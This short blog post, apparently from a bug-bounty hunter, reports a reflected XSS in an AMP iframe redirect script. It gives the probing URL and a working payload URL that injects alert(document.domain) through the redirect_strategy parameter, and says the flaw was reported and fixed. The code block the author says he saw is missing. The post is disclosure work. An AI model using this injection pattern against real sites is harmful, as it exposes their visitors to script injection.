My First 0day Exploit (Reflected XSS) #BUGBOUNTY
- When I went to https://example.com/amp-iframe-redirect?scheme_redirect=&redirect_strategy=0 , saw this code block:
2. Then I thought about which characters I could use. So, I went to: https://example.com/amp-iframe-redirect?scheme_redirect=&redirect_strategy=”’<>/();
); alert(document.domain); if (1
When I go to https://example.com/amp-iframe-redirect?scheme_redirect=&redirect_strategy=); alert(document.domain); if (1 , I saw the xss alert ;)
Some popular companies are using this script. Example;
- Western Union
- Cuvva etc
And reported developer’s bug bounty program. Then, this’s fixed.
If you want to get more notifications about my works, that’s my Twitter account.